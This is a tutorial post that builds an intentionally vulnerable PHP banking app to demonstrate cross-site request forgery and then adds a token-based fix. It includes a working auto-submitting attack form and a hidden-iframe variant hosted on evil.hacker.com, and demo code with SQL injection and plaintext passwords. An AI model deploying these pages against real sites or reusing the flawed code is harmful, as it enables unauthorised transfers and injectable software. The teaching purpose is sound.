Friday 12 June 2015

Cross-Site Request Forgery Attack: Example Application


In a cross-site request forgery (CSRF) attack, the attacker creates an innocuous-looking website that causes the user's browser to submit a request directly to the vulnerable application, performing an action the user did not intend.

In this tutorial, we develop a web application that has a CSRF vulnerability. When a user logs in to the application, a session is created for them. The attacker creates a malicious URL to exploit the CSRF vulnerability; when the user clicks the malicious link, a script on the attacker's page performs a privileged operation on the vulnerable web application using the user's existing session.


Victim web server name: meru.mycompany.com
Attacker web server name: evil.hacker.com


1) The user logs in to the application by visiting the URL http://meru.mycompany.com/login.html and entering a username and password. On successful authentication, a session is created for the user, and the user is redirected to the URL http://meru.mycompany.com/transfer.php.

2) On the page 'transfer.php', the user specifies the account number of the recipient and the amount to transfer.


The page 'transfer.php' contains the following code:

<?php
session_start();
?>
<html>
<body>
<?php
if(!isset($_SESSION['loginid'])){
  echo "please login";
}else{
?>
<h2>Enter Transaction details</h2> 
<form action="perform.php" method="post">
<label>To account no:</label>
<input type="text" name="daccount"  /> <br/>
<label>Transfer Amount:</label> 
<input type="text" name="amount"  /> <br/>
<input type="submit" name="submit" value="submit"/>
</form>
<?php
}
?>
</body>
</html>


We can see that the above code is vulnerable to a CSRF attack for the following reasons:
a) The application relies solely on HTTP cookies for tracking sessions.
b) The attacker can determine all the parameters required to perform the action.

3) The attacker constructs a web page 'http://evil.hacker.com/attacker.php' that makes a cross-domain request to the vulnerable application containing everything needed to perform the privileged action, as shown below:

<html>
<body>
<form action="http://meru.mycompany.com/perform.php" method="post">
<input type="hidden" name="daccount" value="1050" /> <br/>
<input type="hidden" name="amount" value="1000" /> <br/>
</form>
<script>document.forms[0].submit();
</script>
</body>
</html>


This page places all the parameters of the request in hidden form fields and includes a script that submits the form automatically, so no interaction from the user is needed.

4) The attacker hosts this page on his web server and tricks the user into clicking the link http://evil.hacker.com/attacker.php while the user is already logged in to the vulnerable application.

When the user's browser submits the form, it automatically attaches the user's cookies for the target domain; the vulnerable application processes the request in the usual way, and money is transferred to the attacker's account.


The attacker can also use an iframe to launch the attack, as shown below. The advantage of using an iframe is that the output from the victim server is hidden from the user, so the user does not notice that an attack has taken place.

iframe_attack.php
<html>
<body>
<iframe height="0" width="0" src='http://evil.hacker.com/attacker.php'></iframe>
</body>
</html>

In the above case, the user has to click on http://evil.hacker.com/iframe_attack.php.


5) The source code for the application is given below:

login.php
<?php
// Start the session before touching $_SESSION; the original read it first.
session_start();

if(!isset($_SESSION['loginid'])){
  if(isset($_POST['submit'])){
    $loginid = $_POST['loginid'];
    $passwd = $_POST['passwd'];

    $conn = new mysqli('localhost','shabbir','shabbir','mybank');
    if($conn->connect_error){
      die('error connecting to server' . $conn->connect_error);
    }

    // Note: interpolating user input into SQL and storing plaintext passwords are
    // unsafe in their own right; this demo application only illustrates the CSRF flaw.
    $sql = "select loginid,passwd,custname from customer where loginid = '$loginid' and passwd = '$passwd'";

    $result = $conn->query($sql);

    if ($result && $result->num_rows == 1){
      $row = $result->fetch_assoc();
      $custname = $row['custname'];

      $_SESSION['loginid'] = $loginid;
      $_SESSION['custname'] = $custname;

      $conn->close();
      header('Location: transfer.php');
      exit; // stop rendering the login form once the redirect has been sent
    }
    $error_msg="invalid username or password.\n";

    $conn->close();
  }
}
?>


<html>
<head>
<title>Welcome to mybank</title>
</head>

<body>
<h2>Enter login details</h2>
<?php
if(! empty($error_msg)){
        echo "<strong>" . $error_msg . "</strong><br/>";
}
?>

<form action="login.php" method="post">

<label>Login id:</label>
<input type="text" name="loginid"  /> <br/>

<label>Password:</label>
<input type="password" name="passwd"  /> <br/>

<input type="submit" name="submit" value="submit"/>
</form>
</body>
</html>


perform.php
<?php
session_start();
if(!isset($_SESSION['loginid'])){
  echo "please login";
}else{
   // The only check is the session cookie; nothing proves the POST came from
   // transfer.php, which is exactly what the CSRF page above exploits.
   $daccount = $_POST['daccount'];
   $amount = $_POST['amount'];
   $loginid = $_SESSION['loginid'];

   $conn = new mysqli('localhost','shabbir','shabbir','mybank');
   if($conn->connect_error){
      die('error connecting to server' . $conn->connect_error);
   }

   // Debit the logged-in user's account.
   $sql1 = "select * from customer where loginid = '$loginid'";
   $result = $conn->query($sql1);

   if($result->num_rows > 0){
     $row = $result->fetch_assoc();
     $sbalance = $row['balance'];
     $sbalance = $sbalance - $amount;
     echo $sbalance;
   }else{
     echo "0 results";
   }

   // Credit the recipient's account.
   $sql1 = "select * from customer where accountno = '$daccount'";
   $result = $conn->query($sql1);
   if($result->num_rows > 0){
     $row = $result->fetch_assoc();
     $dbalance = $row['balance'];
     $dbalance = $dbalance + $amount;
     echo $dbalance;
   }else{
     echo "0 results";
   }

   $sql1 = "update customer set balance = $sbalance where loginid = '$loginid'";
   if($conn->query($sql1) == TRUE){
        echo "updated successfully";
   }
   else{
        echo "error querying database" . $conn->error;
   }
   $sql1 = "update customer set balance = $dbalance where accountno = '$daccount'";
   if($conn->query($sql1) == TRUE){
        echo "updated successfully";
   }
   else{
        echo "error querying database" . $conn->error;
   }

  $conn->close();

}
?>
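The fix for the weakness listed under step 2 is a synchronizer token that evil.hacker.com cannot read. The following csrf.php is an added example, not code from the original post; it assumes PHP 7.3 or later, and the file name and function names are my own choice.

```php
<?php
// csrf.php (added example, not part of the original application).
// Include it from transfer.php and perform.php with: require 'csrf.php';

// Start the session with cookie flags that also limit CSRF exposure.
// SameSite=Lax stops the browser attaching the session cookie to the
// cross-site POST from evil.hacker.com; the token below is the main check.
function secure_session_start(): void {
    if (session_status() === PHP_SESSION_NONE) {
        $https = !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off';
        session_set_cookie_params([
            'httponly' => true,
            'secure'   => $https,   // true once meru.mycompany.com serves HTTPS
            'samesite' => 'Lax',
        ]);
        session_start();
    }
}

// Issue one unpredictable token per session and keep it server-side.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field for the form in transfer.php. The same-origin policy keeps
// the attacker's page from reading meru.mycompany.com's pages, so the
// attacker cannot learn this value and cannot build a complete request.
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

// Constant-time comparison of the submitted token with the stored one.
function csrf_check(array $post): bool {
    return isset($post['csrf_token'], $_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

// Usage in perform.php, before any database work:
//   require 'csrf.php';
//   secure_session_start();
//   if (!isset($_SESSION['loginid'])) { http_response_code(401); exit('please login'); }
//   if (!csrf_check($_POST))          { http_response_code(403); exit('invalid request'); }
// Usage in transfer.php, inside the <form> element:
//   echo csrf_field();
// The attacker's form posts daccount and amount but no valid csrf_token,
// so perform.php now answers 403 before it touches either balance.
```

The token must be regenerated when a new session is created at login (for example by calling session_regenerate_id and clearing $_SESSION['csrf_token']) so that a token from a previous session cannot be reused.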
